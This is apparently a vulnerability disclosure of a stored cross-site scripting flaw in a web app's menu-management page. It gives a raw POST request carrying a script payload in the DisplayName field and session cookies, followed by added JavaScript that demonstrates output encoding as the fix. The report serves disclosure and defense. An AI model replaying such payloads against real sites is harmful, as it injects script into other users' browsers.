Background system management, menu management: Add menu has a stored XSS

PoC

```
POST /Menu/AddOrModify/ HTTP/1.1
Host: 192.168.3.129:10027
Content-Length: 137
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
X-CSRF-TOKEN-yilezhu: CfDJ8HxjCh0oOylDk40Utlg0kuVlXBEMyXVoXGiey61SvYw8hAPIiz-fO2DBogX_l3Ziric_IafwZeUbK5-LuGS3DLnaH3wSg9JqdMvE89285GFU7vfQEDEtA8RU7UnNYSP2DrohBvaZcDyu2HY1xqEnwiTDi5bEXZxu0tymzd90Uy6eH-xU0avoSSVn1-YFnkpDJA
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.129:10027
Referer: http://192.168.3.129:10027/Menu/AddOrModify/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuX3r0TbTJJJ8LOhX5p3K0CP88Ip43crrOWClJ8I0d9fgVy2BhH1Cz5N7b02wkqQhs01DJv_YhMH6GiU_IzHDoD0vkCfXaX-59z3u3PiiO1qxVAL_5bkc2LO00C5-z_VVXd39BXFjbuv_XH5-ylgpgSpzNcLbT0mwBSZDCzKEHSagKkqwjEl29HJK5lHEDydivsekH_w5uA5QtNkql7ae8RMWLa8848P2-zWKqCMxiJ1cnTa5TDMI8bdb-JZOKOOFJukuEOeClSwylYE-ccI0dKiQD0a6fkhxghdNmISAqfcBLuK70tJHwk5ZxajHI_swebh9vSxXpOI2lBduBlJattOo3OHT25Krwpzw621AsZApX6bgBkxtj8VWW0o8ddbUmXbVAmF5UUVkdPbn8bZWFhCmmpPJ54tcwbJ19UeWc3BlcnOUeRqraNBICavaYsJjSWH3Z-c4JUtSTaOY_P1hxV4lRXUAQjfCIaEDirCUbrguTUwYfxNB6mABHrvVUPMAWUWSq8UaO4KH-l21qF3NUmD
Connection: close

Id=&Name=1111111111111a&DisplayName=%3Cscript%3Ealert(1)%3C%2Fscript%3E&IconUrl=&LinkUrl=&Sort=99&ParentId=0&IsSystem=true&IsDisplay=true
```

Then you can view it in the background: http://192.168.3.129:10027/Menu/LoadData/?page=1&limit=10
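
Added example, not part of the original report and not the project's own code: the form body from the request above decoded into a menu record, then rendered with and without output encoding to show where the mitigation belongs. The function names, the list of free-text fields, and the row markup are assumptions made for illustration.

```javascript
// Constructed sample: the form body taken from the request in the report.
const pocBody = 'Id=&Name=1111111111111a&DisplayName=%3Cscript%3Ealert(1)%3C%2Fscript%3E' +
  '&IconUrl=&LinkUrl=&Sort=99&ParentId=0&IsSystem=true&IsDisplay=true';

// Assumption: these are the free-text fields that reach the menu list view.
const TEXT_FIELDS = ['Name', 'DisplayName', 'IconUrl', 'LinkUrl'];

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the characters that are significant in HTML text and quoted attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Decode an application/x-www-form-urlencoded body into the record that gets stored.
function parseMenuForm(body) {
  const record = {};
  for (const [key, value] of new URLSearchParams(body)) record[key] = value;
  return record;
}

// Unsafe rendering: stored text is concatenated into markup as-is.
function renderRowUnsafe(menu) {
  return `<tr><td>${menu.Name}</td><td>${menu.DisplayName}</td></tr>`;
}

// Safe rendering: every stored text field is encoded at output time.
function renderRowSafe(menu) {
  return `<tr><td>${escapeHtml(menu.Name)}</td><td>${escapeHtml(menu.DisplayName)}</td></tr>`;
}

// Audit helper: which text fields hold characters that change meaning in HTML.
function fieldsNeedingEncoding(menu) {
  return TEXT_FIELDS.filter((field) => /[&<>"']/.test(menu[field] || ''));
}

const menu = parseMenuForm(pocBody);
console.log('fields needing encoding:', fieldsNeedingEncoding(menu));
console.log('unsafe row:', renderRowUnsafe(menu));
console.log('safe row:  ', renderRowSafe(menu));
```

Encoding at output time also neutralizes records that were stored before any input validation was added.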